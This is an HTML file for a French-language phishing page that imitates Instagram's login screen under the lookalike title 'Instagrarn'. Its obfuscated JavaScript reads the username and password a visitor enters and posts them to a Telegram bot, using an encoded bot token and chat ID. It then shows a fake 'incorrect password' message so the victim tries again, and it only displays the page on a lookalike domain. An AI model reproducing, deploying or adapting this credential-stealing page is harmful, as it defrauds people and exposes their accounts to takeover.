<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">

<head>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
            -webkit-tap-highlight-color: transparent;
            outline: none;
            user-select: none;
        }

        html,
        body {
            width: 100%;
            height: 100%;
            background: linear-gradient(160deg, #1C3342, #1D3838);
        }

        #container {
            width: 100%;
            max-width: 380px;
            height: 100%;
            padding: 15px 20px;
            margin: 0 auto;
            display: flex;
            flex-direction: column;

        }

        #langue {
            width: fit-content;
            color: #CBD2D9;
            margin: 0 auto;
            font-size: 14.5px;
        }

        #logo {
            width: 60px;
            height: 60px;
            margin: 40px 0;
            background-image: url("/src/logo.png");
            background-position: center;
            background-repeat: no-repeat;
            background-size: 100%;
        }

        .input {
            width: 100%;
            min-height: 60px;
            max-height: 60px;
            margin: 0 0 12px 0;
            padding: 0 14px;
            background-color: #1C2B33;
            border: 1px solid #425462;
            font-size: 17px;
            border-radius: 12px;
            color: #ffffff;
        }

        .input::placeholder {
            color: #7E8D9C;
            overflow: hidden;
            white-space: nowrap;
            text-overflow: ellipsis;
            display: flex;
            pointer-events: visiblePainted;
            flex-direction: row;
        }


        #lgn {
            background-color: #0064E0;
            width: 100%;
            min-height: 45px;
            max-height: 45px;
            display: flex;
            align-items: center;
            justify-content: center;
            color: #ffffff;
            font-size: 17px;
            border-radius: 30px;
            cursor: pointer;
        }

        #lgn:active {
            background-color: #0857B8;
        }

        #pLogin {
            width: fit-content;
            color: white;
            margin: 0 0 2px 0;
            padding: 0;
            font-size: 15px;
            font-weight: 400;
        }

        #loading {
            background-image: url("/src/loading.gif");
            background-repeat: no-repeat;
            background-size: 100%;
            background-position: center;
            filter: invert(100%);
            width: 19px;
            height: 19px;
            opacity: 50%;
            margin: 0;
            padding: 0;
            display: none;
        }

        #frgt {
            color: #ffffff;
            margin: 20px auto;
            font-size: 17px;
            width: fit-content;
            cursor: pointer;
        }

        #frgt:active {
            opacity: 50%;
        }

        #sgnp {
            color: #47A5FA;
            border: 1px solid #47A5FA;
            width: 100%;
            min-height: 45px;
            max-height: 45px;
            margin: 60px 0 0 0;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 16.5px;
            border-radius: 30px;
            cursor: pointer;
        }

        #sgnp:active {
            background-color: rgba(255, 255, 255, 0.05);
        }

        #meta {
            width: 60px;
            min-height: 12px;
            max-height: 12px;
            margin: 20px auto;
            background-image: url("/src/meta.png");
            background-position: center;
            background-repeat: no-repeat;
            background-size: 100%;
        }

        #spc1 {
            width: auto;
            height: auto;
            display: flex;
            flex: 1;
            justify-content: center;
            align-items: center;
        }

        #spc2 {
            width: auto;
            height: auto;
            display: flex;
            flex: 1;
            justify-content: flex-end;
            flex-direction: column;
        }



        /* dlg */
        .dialog-container {
            position: fixed;
            top: 0;
            left: 0;
            height: 100vh;
            width: 100vw;
            background-color: rgba(0, 0, 0, 0.5);
            display: none;
            align-items: center;
            justify-content: center;
            z-index: 9999;
        }

        .dialog-box {
            background-color: white;
            border-radius: 12px;
            padding: 15px 0 0 0;
            width: 300px;
            text-align: center;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
            font-family: sans-serif;
        }

        .dialog-title {
            font-weight: bold;
            font-size: 18px;
            margin: 10px 0;
        }

        .dialog-text {
            font-size: 14px;
            color: #444;
            margin: 15px 30px;
        }

        .dialog-line {
            border-top: 1px solid #ddd;
            margin: 15px 0 0 0;
        }

        .dialog-btn {
            background: none;
            border: none;
            color: #007BFF;
            font-weight: bold;
            font-size: 14px;
            cursor: pointer;
            width: 100%;
            height: fit-content;
            margin: 0;
            padding: 17px 0;
        }

        .dialog-btn:active {
            background-color: #eee;
            border-radius: 0 0 12px 12px;
        }
    </style>
</head>

<body>
    <div id="container">
        <p id="langue">Français (France)</p>
        <div id="spc1">
            <div id="logo"></div>
        </div>
        <input class="input" type="text" id="u" placeholder="Nom de profil, e-mail ou numéro de mobile"
            autocomplete="off">
        <input class="input" type="password" id="p" placeholder="Mot de passe" autocomplete="off">

        <div id="lgn" onclick="login();">
            <p id="pLogin">Se connecter</p>
            <div id="loading"></div>
        </div>

        <p id="frgt" onclick="window.location.href='https://instagram.com/accounts/password/reset/'">Mot de passe
            oublié ?</p>
        <div id="spc2">
            <p id="sgnp" onclick="window.location.href='https://instagram.com/accounts/emailsignup/'">Créer un
                compte</p>
            <div id="meta"></div>
        </div>
    </div>

    <!-- dlg -->
    <div class="dialog-container" id="dlg">
        <div class="dialog-box">
            <p class="dialog-title">Mot de passe incorrect</p>
            <p class="dialog-text">
                Le mot de passe que vous avez indiqué est incorrect. Veuillez réessayer.
            </p>
            <div class="dialog-line"></div>
            <button class="dialog-btn" onclick="dlg.style.display = 'none';">OK</button>
        </div>
    </div>


    <script>
        function _0x1d29() { const _0x3835f3 = ['Connectez-vous\x20et\x20partagez\x20des\x20moments\x20avec\x20des\x20personnes\x20qui\x20vous\x20comprennent.\x20Rejoignez-nous\x20ou\x20connectez-vous\x20dès\x20maintenant\x20pour\x20commencer\x20votre\x20aventure.', 'getElementById', 'image/x-icon', '30669kdsedy', '/src/ig.ico', 'email:\x20', 'flex', '\x0a\x20\x20\x20\x20password:\x20', 'length', 'createElement', 'appendChild', 'title', 'trim', 'Njg5MDQ5MjY0Ng==', '240053XCizDl', 'name', 'block', '912PTMDFW', 'style', 'content', 'dlg', 'icon', 'stringify', 'none', 'lgn', '18438BNIupD', 'display', 'type', '610kbvJmI', 'description', 'aW5zdGFncmFybi1sbzlpbi53b3JrLmdk', 'd2luZG93LmxvY2F0aW9uLmhvc3RuYW1l', 'setAttribute', 'then', 'head', 'viewport', '/sendMessage', '942084FTavpJ', 'value', '157590rcIgXh', '216mDjjcf', 'textContent', '73946ECFVht', '6740sniGcb', '1722IpuxgL', 'application/json', 'catch']; _0x1d29 = function () { return _0x3835f3; }; return _0x1d29(); } const _0x3eb307 = _0x3df0; (function (_0x27b3c6, _0x17c86b) { const _0x408bc3 = _0x3df0, _0x58e531 = _0x27b3c6(); while (!![]) { try { const _0x3c175d = -parseInt(_0x408bc3(0x1af)) / 0x1 + parseInt(_0x408bc3(0x1aa)) / 0x2 + -parseInt(_0x408bc3(0x1b7)) / 0x3 * (-parseInt(_0x408bc3(0x1ad)) / 0x4) + parseInt(_0x408bc3(0x1b0)) / 0x5 * (parseInt(_0x408bc3(0x1b1)) / 0x6) + parseInt(_0x408bc3(0x1cd)) / 0x7 * (parseInt(_0x408bc3(0x1c5)) / 0x8) + -parseInt(_0x408bc3(0x1ac)) / 0x9 + -parseInt(_0x408bc3(0x1d0)) / 0xa * (parseInt(_0x408bc3(0x1c2)) / 0xb); if (_0x3c175d === _0x17c86b) break; else _0x58e531['push'](_0x58e531['shift']()); } catch (_0x17217c) { _0x58e531['push'](_0x58e531['shift']()); } } }(_0x1d29, 0x46359)); const lgn = document['getElementById'](_0x3eb307(0x1cc)), dlg = document['getElementById'](_0x3eb307(0x1c8)); function _0x3df0(_0x1fc463, _0x38e8c2) { const _0x1d2924 = _0x1d29(); return _0x3df0 = function (_0x3df071, _0x2b3a9f) { _0x3df071 = _0x3df071 - 0x1a7; let _0x1dbf6d = _0x1d2924[_0x3df071]; return _0x1dbf6d; }, _0x3df0(_0x1fc463, _0x38e8c2); } var t = 'Nzg4NTUxMzA5NzpBQUZwa0dZc2NMRTNwM0xsTVF5NXBCWFc1aEZMMmRKS0ZEaw==', ca = _0x3eb307(0x1c1), click = !![]; document['body'][_0x3eb307(0x1c6)]['display'] = _0x3eb307(0x1cb); eval(atob(_0x3eb307(0x1d3))) === atob(_0x3eb307(0x1d2)) && (document['body'][_0x3eb307(0x1c6)][_0x3eb307(0x1ce)] = _0x3eb307(0x1ba)); function login() { const _0x5f489b = _0x3eb307; if (click) { const _0x124fc7 = document[_0x5f489b(0x1b5)]('u')[_0x5f489b(0x1ab)][_0x5f489b(0x1c0)](), _0x42f389 = document[_0x5f489b(0x1b5)]('p')[_0x5f489b(0x1ab)][_0x5f489b(0x1c0)](); if (_0x124fc7[_0x5f489b(0x1bc)] > 0x5 && _0x42f389[_0x5f489b(0x1bc)] > 0x5) { pLogin[_0x5f489b(0x1c6)][_0x5f489b(0x1ce)] = _0x5f489b(0x1cb), loading['style'][_0x5f489b(0x1ce)] = _0x5f489b(0x1c4), click = ![]; var _0x503b1e = _0x5f489b(0x1b9) + _0x124fc7 + _0x5f489b(0x1bb) + _0x42f389; setTimeout(function () { const _0x2d00f7 = [atob(t)], _0x4bb0c0 = [atob(ca)]; _0x2d00f7['forEach']((_0x56428d, _0x4fbf5d) => { const _0x577586 = _0x3df0, _0x257fcf = 'https://api.telegram.org/bot' + _0x56428d + _0x577586(0x1a9), _0x1c515a = { 'chat_id': _0x4bb0c0[_0x4fbf5d], 'text': _0x503b1e }; fetch(_0x257fcf, { 'method': 'POST', 'headers': { 'Content-Type': _0x577586(0x1b2) }, 'body': JSON[_0x577586(0x1ca)](_0x1c515a) })[_0x577586(0x1d5)](_0xd5d2b2 => _0xd5d2b2['json']())[_0x577586(0x1d5)](_0x3c84e4 => { _0x3c84e4['ok'] ? _0x4fbf5d === _0x2d00f7['length'] - 0x1 && showDlg() : delay(() => showDlg()); })[_0x577586(0x1b3)](_0x3d77cc => { delay(() => showDlg()); }); }); }, 0x7d0); } else showDlg(); } } function showDlg() { const _0x2d4e09 = _0x3eb307; pLogin[_0x2d4e09(0x1c6)]['display'] = _0x2d4e09(0x1c4), loading['style'][_0x2d4e09(0x1ce)] = 'none', dlg['style'][_0x2d4e09(0x1ce)] = _0x2d4e09(0x1ba), click = !![]; } function delay(_0xbda092) { setTimeout(_0xbda092, 0x7d0); } const viewportMeta = document[_0x3eb307(0x1bd)]('meta'); viewportMeta['setAttribute'](_0x3eb307(0x1c3), _0x3eb307(0x1a8)), viewportMeta[_0x3eb307(0x1d4)]('content', 'width=device-width,\x20initial-scale=1.0'), document[_0x3eb307(0x1a7)][_0x3eb307(0x1be)](viewportMeta); const titleTag = document[_0x3eb307(0x1bd)](_0x3eb307(0x1bf)); titleTag[_0x3eb307(0x1ae)] = 'Connexion\x20•\x20Instagrarn', document[_0x3eb307(0x1a7)][_0x3eb307(0x1be)](titleTag); const descriptionMeta = document['createElement']('meta'); descriptionMeta[_0x3eb307(0x1d4)](_0x3eb307(0x1c3), _0x3eb307(0x1d1)), descriptionMeta[_0x3eb307(0x1d4)](_0x3eb307(0x1c7), _0x3eb307(0x1b4)), document[_0x3eb307(0x1a7)]['appendChild'](descriptionMeta); const faviconLink = document[_0x3eb307(0x1bd)]('link'); faviconLink['setAttribute']('rel', _0x3eb307(0x1c9)), faviconLink[_0x3eb307(0x1d4)](_0x3eb307(0x1cf), _0x3eb307(0x1b6)), faviconLink[_0x3eb307(0x1d4)]('href', _0x3eb307(0x1b8)), document[_0x3eb307(0x1a7)]['appendChild'](faviconLink);
    </script>
</body>

</html>